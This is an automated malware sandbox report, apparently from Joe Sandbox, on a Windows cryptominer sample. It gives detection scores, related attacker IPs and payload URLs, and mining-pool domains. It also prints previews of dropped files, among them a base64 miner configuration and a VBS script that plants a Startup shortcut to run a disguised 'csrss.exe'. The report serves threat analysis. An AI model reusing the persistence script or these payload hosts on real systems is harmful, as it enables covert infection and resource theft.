                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                    Number of analysed new started processes analysed:30
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • HDC enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.expl.evad.mine.winEXE@25/14@2/3
                                                                                                    EGA Information:Failed
                                                                                                    HDC Information:
                                                                                                    • Successful, ratio: 98.4% (good quality ratio 92.6%)
                                                                                                    • Quality average: 75.4%
                                                                                                    • Quality standard deviation: 27.1%
                                                                                                    HCA Information:Failed
                                                                                                    Cookbook Comments:
                                                                                                    • Adjust boot time
                                                                                                    • Enable AMSI
                                                                                                    Warnings:
                                                                                                    Show All
                                                                                                    • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 52.147.198.201, 23.211.6.115, 168.61.161.212, 104.43.193.48, 204.79.197.200, 13.107.21.200, 23.211.4.86, 20.82.210.154, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.54.110.249
                                                                                                    • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.

                                                                                                    Simulations

                                                                                                    Behavior and APIs

                                                                                                    TimeTypeDescription
                                                                                                    22:24:22API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                    22:25:22AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url
                                                                                                    22:25:39API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                                    Joe Sandbox View / Context

                                                                                                    IPs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                    45.144.225.135P7Oa6i5muL.exeGet hashmaliciousBrowse
                                                                                                    • 45.144.225.135/config.txt
                                                                                                    H9QnI1DbC1.exeGet hashmaliciousBrowse
                                                                                                    • 45.144.225.135/config.txt
                                                                                                    7xhLwiPIrR.exeGet hashmaliciousBrowse
                                                                                                    • 45.144.225.135/notepad.exe
                                                                                                    qhgv3aRzkZ.exeGet hashmaliciousBrowse
                                                                                                    • 45.144.225.135/conhost.exe
                                                                                                    zIrx1wUddJ.exeGet hashmaliciousBrowse
                                                                                                    • 45.144.225.135/config.txt
                                                                                                    E91sLsvV8S.exeGet hashmaliciousBrowse
                                                                                                    • 45.144.225.135/config.txt
                                                                                                    SecuriteInfo.com.Trojan.GenericKD.46284216.26505.exeGet hashmaliciousBrowse
                                                                                                    • 45.144.225.135/notepad.exe
                                                                                                    notepad.exeGet hashmaliciousBrowse
                                                                                                    • 45.144.225.135/notepad.exe
                                                                                                    taskhost.exeGet hashmaliciousBrowse
                                                                                                    • 45.144.225.135/config2.txt
                                                                                                    csrss.exeGet hashmaliciousBrowse
                                                                                                    • 45.144.225.135/notepad.exe
                                                                                                    notepad.exeGet hashmaliciousBrowse
                                                                                                    • 45.144.225.135/config.txt
                                                                                                    RcyatUBgOo.exeGet hashmaliciousBrowse
                                                                                                    • 45.144.225.135/notepad.exe
                                                                                                    1fJCh9Qn75.exeGet hashmaliciousBrowse
                                                                                                    • 45.144.225.135/notepad.exe
                                                                                                    xS9h6XCLaY.exeGet hashmaliciousBrowse
                                                                                                    • 45.144.225.135/notepad.exe
                                                                                                    WHK1KXo5rL.exeGet hashmaliciousBrowse
                                                                                                    • 45.144.225.135/notepad.exe
                                                                                                    ifulH09vsC.exeGet hashmaliciousBrowse
                                                                                                    • 45.144.225.135/notepad.exe
                                                                                                    SecuriteInfo.com.Trojan.Siggen12.56619.6518.exeGet hashmaliciousBrowse
                                                                                                    • 45.144.225.135/notepad.exe
                                                                                                    SecuriteInfo.com.__vbaHresultCheckObj.21994.exeGet hashmaliciousBrowse
                                                                                                    • 45.144.225.135/config.txt
                                                                                                    SecuriteInfo.com.Trojan.Siggen12.45962.28547.exeGet hashmaliciousBrowse
                                                                                                    • 45.144.225.135/godeth.exe
                                                                                                    SecuriteInfo.com.Variant.Johnnie.321295.17359.exeGet hashmaliciousBrowse
                                                                                                    • 45.144.225.135/config.txt
                                                                                                    192.99.69.170csrss.exeGet hashmaliciousBrowse

                                                                                                      Domains

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      xmr-us-east1.nanopool.org4HoFnQosUb.exeGet hashmaliciousBrowse
                                                                                                      • 142.44.242.100
                                                                                                      P7Oa6i5muL.exeGet hashmaliciousBrowse
                                                                                                      • 142.44.242.100
                                                                                                      H9QnI1DbC1.exeGet hashmaliciousBrowse
                                                                                                      • 144.217.14.139
                                                                                                      7xhLwiPIrR.exeGet hashmaliciousBrowse
                                                                                                      • 142.44.243.6
                                                                                                      qhgv3aRzkZ.exeGet hashmaliciousBrowse
                                                                                                      • 144.217.14.139
                                                                                                      zIrx1wUddJ.exeGet hashmaliciousBrowse
                                                                                                      • 142.44.242.100
                                                                                                      E91sLsvV8S.exeGet hashmaliciousBrowse
                                                                                                      • 142.44.243.6
                                                                                                      SecuriteInfo.com.Trojan.GenericKD.46284216.26505.exeGet hashmaliciousBrowse
                                                                                                      • 144.217.14.109
                                                                                                      notepad.exeGet hashmaliciousBrowse
                                                                                                      • 142.44.242.100
                                                                                                      csrss.exeGet hashmaliciousBrowse
                                                                                                      • 144.217.14.109
                                                                                                      notepad.exeGet hashmaliciousBrowse
                                                                                                      • 192.99.69.170
                                                                                                      RcyatUBgOo.exeGet hashmaliciousBrowse
                                                                                                      • 144.217.14.109
                                                                                                      1fJCh9Qn75.exeGet hashmaliciousBrowse
                                                                                                      • 144.217.14.109
                                                                                                      xS9h6XCLaY.exeGet hashmaliciousBrowse
                                                                                                      • 142.44.243.6
                                                                                                      4FNTlzlu10.exeGet hashmaliciousBrowse
                                                                                                      • 142.44.242.100
                                                                                                      73invoice #2307.exeGet hashmaliciousBrowse
                                                                                                      • 142.44.242.100

                                                                                                      ASN

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      DEDIPATH-LLCUSSecuriteInfo.com.Dropped.Trojan.GenericKD.37247948.2936.exeGet hashmaliciousBrowse
                                                                                                      • 74.201.28.67
                                                                                                      1nM1IXHzg2.exeGet hashmaliciousBrowse
                                                                                                      • 74.201.28.67
                                                                                                      OTzyxNyOTP.exeGet hashmaliciousBrowse
                                                                                                      • 74.201.28.67
                                                                                                      EdZxuvmhwc.exeGet hashmaliciousBrowse
                                                                                                      • 74.201.28.67
                                                                                                      skin.exeGet hashmaliciousBrowse
                                                                                                      • 45.89.106.164
                                                                                                      stin.exeGet hashmaliciousBrowse
                                                                                                      • 45.89.106.164
                                                                                                      oMNhCoZdeT.dllGet hashmaliciousBrowse
                                                                                                      • 45.86.65.164
                                                                                                      lovemetertok.dllGet hashmaliciousBrowse
                                                                                                      • 45.86.65.164
                                                                                                      Positions_invoice-103246.xlsmGet hashmaliciousBrowse
                                                                                                      • 45.86.65.164
                                                                                                      4fZX8fJwHn.dllGet hashmaliciousBrowse
                                                                                                      • 45.86.65.164
                                                                                                      MtSvkc87ybOwjvd.exeGet hashmaliciousBrowse
                                                                                                      • 74.201.28.32
                                                                                                      purch_details_7683561.xlsmGet hashmaliciousBrowse
                                                                                                      • 185.255.130.247
                                                                                                      3X5L2fP53V.xlsxGet hashmaliciousBrowse
                                                                                                      • 185.255.130.247
                                                                                                      P7Oa6i5muL.exeGet hashmaliciousBrowse
                                                                                                      • 45.144.225.135
                                                                                                      PO7581.exeGet hashmaliciousBrowse
                                                                                                      • 45.15.143.171
                                                                                                      CreditCardAuth.jarGet hashmaliciousBrowse
                                                                                                      • 45.133.1.212
                                                                                                      CreditCardAuth.jarGet hashmaliciousBrowse
                                                                                                      • 45.133.1.212
                                                                                                      Receipt09072021.jarGet hashmaliciousBrowse
                                                                                                      • 45.133.1.212
                                                                                                      Receipt09072021.jarGet hashmaliciousBrowse
                                                                                                      • 45.133.1.212
                                                                                                      Swift Payment Copy.exeGet hashmaliciousBrowse
                                                                                                      • 74.201.28.104
                                                                                                      OVHFR4HoFnQosUb.exeGet hashmaliciousBrowse
                                                                                                      • 142.44.242.100
                                                                                                      SnCJx8VVDE.exeGet hashmaliciousBrowse
                                                                                                      • 158.69.65.151
                                                                                                      atZdmSgC4J.exeGet hashmaliciousBrowse
                                                                                                      • 158.69.65.151
                                                                                                      ZyikLEasGq.exeGet hashmaliciousBrowse
                                                                                                      • 51.178.146.144
                                                                                                      #6495PI-29458-2020.exeGet hashmaliciousBrowse
                                                                                                      • 147.135.255.78
                                                                                                      PI9SGLOVEDA01912.exeGet hashmaliciousBrowse
                                                                                                      • 51.79.119.220
                                                                                                      Statement from NTXSD.exeGet hashmaliciousBrowse
                                                                                                      • 51.75.191.89
                                                                                                      JOYPEn9pr9Get hashmaliciousBrowse
                                                                                                      • 149.60.183.129
                                                                                                      47a8af.exe.exeGet hashmaliciousBrowse
                                                                                                      • 158.69.65.151
                                                                                                      Comprobante1.vbsGet hashmaliciousBrowse
                                                                                                      • 167.114.22.12
                                                                                                      92CRMNlBq8Get hashmaliciousBrowse
                                                                                                      • 198.27.68.34
                                                                                                      Taf5zLti30Get hashmaliciousBrowse
                                                                                                      • 188.165.232.76
                                                                                                      5qpsqg7U0GGet hashmaliciousBrowse
                                                                                                      • 51.79.241.67
                                                                                                      LyxN1ckWTWGet hashmaliciousBrowse
                                                                                                      • 149.202.131.34
                                                                                                      c51w5YSYdOGet hashmaliciousBrowse
                                                                                                      • 164.133.166.62
                                                                                                      sX21AoaplqFHxse.exeGet hashmaliciousBrowse
                                                                                                      • 54.38.220.85
                                                                                                      G1638.exeGet hashmaliciousBrowse
                                                                                                      • 213.186.33.5
                                                                                                      eAtDhymLzpGet hashmaliciousBrowse
                                                                                                      • 213.32.50.249
                                                                                                      qt75NPEt0tGet hashmaliciousBrowse
                                                                                                      • 149.202.27.98
                                                                                                      qgQgEjI283Get hashmaliciousBrowse
                                                                                                      • 164.132.56.199

                                                                                                      JA3 Fingerprints

                                                                                                      No context

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\ProgramData\LKBNMTFJgl\cfg
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2140
                                                                                                      Entropy (8bit):5.557738244951003
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:lCHUL3qQEzCmini9iqvciaXkih9icue6bhvYbUbo:EH9QWv/ih9Tue6ybUE
                                                                                                      MD5:2DE48065534A637941090D8F3E04044F
                                                                                                      SHA1:EEAB2C38DD711A9BADB8265E11963732EA9C84DB
                                                                                                      SHA-256:8ABF520009CEA0E0C1B67563FD89C4C0E0403744942763D843E39EED180A1ED7
                                                                                                      SHA-512:2D1466D5F09DF4F6628092A2D7D210728536A1649CFECAE362D907D61088E32574290A350848F161C67FE008B2E46864161134C63560763BE932C3A631A24DC1
                                                                                                      Malicious:false
                                                                                                      Preview: ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiAyDQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQki
                                                                                                      C:\ProgramData\LKBNMTFJgl\cfgi
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2140
                                                                                                      Entropy (8bit):5.5574864173164125
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:lCHUL3qQEzlmini9iqvciaXkih9icue6bhvYbUbo:EH9QZv/ih9Tue6ybUE
                                                                                                      MD5:6CAEE3EB287981EC875E5AD3B85DBA1D
                                                                                                      SHA1:665E6F0252A71C6AA31A7FBCE07D9301182953C5
                                                                                                      SHA-256:4DD2C67C3EF1DE5A70FE97123AA01C2D7FEAFB96F079EF2DE0E64CB9D73A54A8
                                                                                                      SHA-512:B6C71536CC290FFE07F1638ED99588CBB8C78997A72CCDF0D8E9059D8D4C932CB8E5195F06A42DF2CBACFE650C9A4CD1616DE30D03DC947E2902C103C4A7E6B8
                                                                                                      Malicious:false
                                                                                                      Preview: ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiA0DQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQki
                                                                                                      C:\ProgramData\LKBNMTFJgl\csrss
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3627520
                                                                                                      Entropy (8bit):6.686736411250198
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:49152:JJjN9IQEiXrMhVoo5g+XoQG15WzZp13/Ln7c4lo4nC8sbXQdrb:bnIQEiUEPb
                                                                                                      MD5:D572DA9202196121D952231F26D65D07
                                                                                                      SHA1:8934580E7EE3F3852E159298769BDD38BCAA12A0
                                                                                                      SHA-256:15337A846C1E262136124361B3624DDD3519CF3C7F93ABA1ED75728A482FC662
                                                                                                      SHA-512:DE311F400E980D5FC987D6A5262057823B9DC3F9E7930623FAB16C9954977949B3B0901DE136548DB1F3A7B5D864DAD2738C791D511241CE4E49E8D83F7DEA5A
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 24%
                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X..`.................(7..0.......G7.. ...`7...@.. ........................7...........@.................................8G7.W....`7. ,....................7...................................................... ............... ..H............text....'7.. ...(7................. ..`.rsrc... ,...`7......*7.............@..@.reloc........7......X7.............@..B................tG7.....H.......<-7..............3..@.6..........................................0.............-.&(....+.&+.*....0..........s....(....t.....-.&+......+.*....~....*..0...........(......-.&+.(....+.*....*...*...*...*...*...*...*...0..'........,..{....,..{....o.......-.&&+.(....+.*..0..L........s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&..:....&.{.....o.....{......s....o.....{....r...po.....{.....P..s....o.....{.....o.....{....r...po
                                                                                                      C:\ProgramData\LKBNMTFJgl\e9c1286a28_3.1.0
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3272
                                                                                                      Entropy (8bit):3.5391176048802047
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:PnPWWWWWWWWWWciWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWr:0wfIa
                                                                                                      MD5:97336FD69071FE322CC57F730C0EA273
                                                                                                      SHA1:97C86F938D64DD5EB84BDD6D0C16AC73B0762590
                                                                                                      SHA-256:F5C9FAF94FDBE5C9317FC89D5536B1CF3D0520EFB17A504DD9AA0E15F9607CF6
                                                                                                      SHA-512:160225663F7EC8D181AD5DC4E51ADE2E1AAE76B6D456B17B68E6E1D340290A21AF000CA297ED298C7D6B7B12DB8679EA81AA90EEDF2D92017E8C2CA93D289ADC
                                                                                                      Malicious:false
                                                                                                      Preview: H\@.BK.WUGB..VTV_A]Z[.V@S......801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125_LMB..................XVC]EYT.WMR892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892
                                                                                                      C:\ProgramData\LKBNMTFJgl\r.vbs
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):654
                                                                                                      Entropy (8bit):3.6127667288387637
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:DJhvugypjBQMyogMJsW+jCRAbjMwCdKIiDHvhFkqy30mgZM3LCKKvbMX4FHkqm3H:DJhLqyjCyjMKFNyEmgZMbaDMoFHNc
                                                                                                      MD5:AEEB61834027553533CF0BC510C9A707
                                                                                                      SHA1:A5D2DD201642C930AC8E7A64A5E020A4F37E4529
                                                                                                      SHA-256:132032C1CFFCA8BCECC5210602F9B37E6795BC9C8CAC37290E3F207DDBE9E5D5
                                                                                                      SHA-512:7287C6ADD852B8AE0AB18B6B3ED6BB9E1566DE2384372975504313C09DB741A70188E35F820FDC7F13261386B8CEABBBC4BD6680FBD1AE58418AFDA93DFFC756
                                                                                                      Malicious:true
                                                                                                      Preview: S.e.t. .o.b.j.F.S.O.=.C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".).....o.u.t.F.i.l.e.=.".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.t.a.r.t. .M.e.n.u.\.P.r.o.g.r.a.m.s.\.S.t.a.r.t.u.p.\.v.i.T.R.M.U.u.K.e.V...u.r.l.".....S.e.t. .o.b.j.F.i.l.e. .=. .o.b.j.F.S.O...C.r.e.a.t.e.T.e.x.t.F.i.l.e.(.o.u.t.F.i.l.e.,.T.r.u.e.).....o.b.j.F.i.l.e...W.r.i.t.e. .".[.I.n.t.e.r.n.e.t.S.h.o.r.t.c.u.t.].". .&. .v.b.C.r.L.f. .&. .".U.R.L.=.".".f.i.l.e.:./././.C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.L.K.B.N.M.T.F.J.g.l.\.c.s.r.s.s...e.x.e.".".".....o.b.j.F.i.l.e...C.l.o.s.e.......
                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4096
                                                                                                      Entropy (8bit):0.5946373705635158
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:bn6/ek1GaD0JOCEfMuaaD0JOCEfMKQmDX71Al/gz2cE0fMbhEZolrRSQ2hyYIIT:b6/NGaD0JcaaD0JwQQXxAg/0bjSQJ
                                                                                                      MD5:BABF932FF399B022AE23CF79439D29C3
                                                                                                      SHA1:7377DD90B311184D19DBEDB7387D8EF3E716BFF0
                                                                                                      SHA-256:5CD6CA868EB0E9461A28E1AAADA0E4B30E41F20835B1262DEB5DF719FADF9B37
                                                                                                      SHA-512:FCAB78D3055D470712F000D48C947AB13A30470735A0E5CB8829A2B05AC5F5330E4315613AC260CCA970C7C8B22D36024678FEA12F5614052CE5F3F27F07F4EB
                                                                                                      Malicious:false
                                                                                                      Preview: ....E..h..(..........ys.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................ys...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x17182133, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                      Category:dropped
                                                                                                      Size (bytes):32768
                                                                                                      Entropy (8bit):0.0956548716955069
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:LF0+lz8O4blR1YqK5F0+lz8O4blR1YqK:a3
                                                                                                      MD5:A12A2E0DC8B30A6272BCED568FDDACF3
                                                                                                      SHA1:7D1CD0E8F68D088DA667D0AEB26E35A092604C1F
                                                                                                      SHA-256:AFEE6B5519A5E230CC0BA5828285C35446FE9BD533D5B964531FCFEBB90245CF
                                                                                                      SHA-512:658557186808C70177FB89AC873C211D65964439A7A781D077C1EF9EDC4E6E6EE3BA1F86D7B4143A471660710E074127112B5411E6B7ED5EBC2E9A145FF39130
                                                                                                      Malicious:false
                                                                                                      Preview: ..!3... ................e.f.3...w........................&..........w.......y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.......................................................................................................................................................................................................................................J.......y..................."......y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8192
                                                                                                      Entropy (8bit):0.11070935811004139
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:k4Sl/l7EvyC9/+Al/bJdAtiC9dce/loll:kj/liy+/+At4BG
                                                                                                      MD5:70C4886701CB42678125BD6F721BBEE3
                                                                                                      SHA1:5C57A8597AB15FA2E06D6DB481D70A49204D9470
                                                                                                      SHA-256:6B9E8DFC3610F433E722D7E91D1F0F525F662CC3DF703AC405EEC289922ADF68
                                                                                                      SHA-512:43D82602A2BA8C7A0781314ED57019A577A33204DEB633243597F7F66B4CAE4C85DAB7EDCDE37791F9FC34AD5886DE5C4ECC4ED607CA7CFFA2927C6481A33EEC
                                                                                                      Malicious:false
                                                                                                      Preview: ..T[.....................................3...w.......y.......w...............w.......w....:O.....w...................."......y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4rC1bQcnl5.exe.log
                                                                                                      Process:C:\Users\user\Desktop\4rC1bQcnl5.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:modified
                                                                                                      Size (bytes):1119
                                                                                                      Entropy (8bit):5.356708753875314
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
                                                                                                      MD5:3197B1D4714B56F2A6AC9E83761739AE
                                                                                                      SHA1:3B38010F0DF51C1D4D2C020138202DABB686741D
                                                                                                      SHA-256:40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
                                                                                                      SHA-512:58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
                                                                                                      Malicious:true
                                                                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                      C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
